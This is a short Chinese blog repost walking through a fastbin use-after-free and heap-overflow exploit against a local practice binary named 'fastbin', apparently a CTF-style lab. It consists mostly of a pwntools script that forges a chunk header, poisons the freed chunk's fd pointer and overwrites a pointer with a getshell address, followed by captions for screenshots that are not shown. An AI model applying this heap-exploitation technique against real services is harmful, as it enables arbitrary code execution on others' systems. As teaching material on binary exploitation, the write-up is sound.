Fastbin 堆溢出 Use After Free
作者:互联网
shell 地址
#-*- coding: utf-8 -*-
from pwn import *
elf = ELF('./fastbin')
sh = process('./fastbin')
getshell = 0x80487c6
def Add(num):
sh.sendafter('choice:\n', '1')
sh.sendafter('id:\n', str(num))
def Del(num):
sh.sendafter('choice:\n', '2')
sh.sendafter('id:\n', str(num))
def Read(num, content):
sh.sendafter('choice:\n', '3')
sh.sendafter('id:\n', str(num))
sh.sendafter('content:\n', content)
# p32(0)是填充malloc_chunk的prev_size
# p32(0x29)是填充malloc_chunk的size
sh.sendafter('Your name:\n', p32(0)+p32(0x29))
sh.recvuntil('0x')
buff_addr = int(sh.recv(8), 16)
print(hex(buff_addr))
payload = 'a'*32 + p32(0) + p32(0x29) + p32(buff_addr)
Add(0)
Add(1)
Del(1)
Read(0, payload)
Add(1)
Add(2)
payload = 'a'*0x12 + p32(getshell)
Read(2, payload)
sh.sendafter('choice:\n', '4')
sh.interactive()
两次运行Add后:
删掉1之后:
read后:
fd跟bin打印的堆地址一样:
pre_size和size已经填充上:
又创建了一个node:
shell地址已被写入:
执行shell:
标签:Use,num,sendafter,After,Free,Add,sh,p32,size 来源: https://blog.csdn.net/lilongsy/article/details/120580458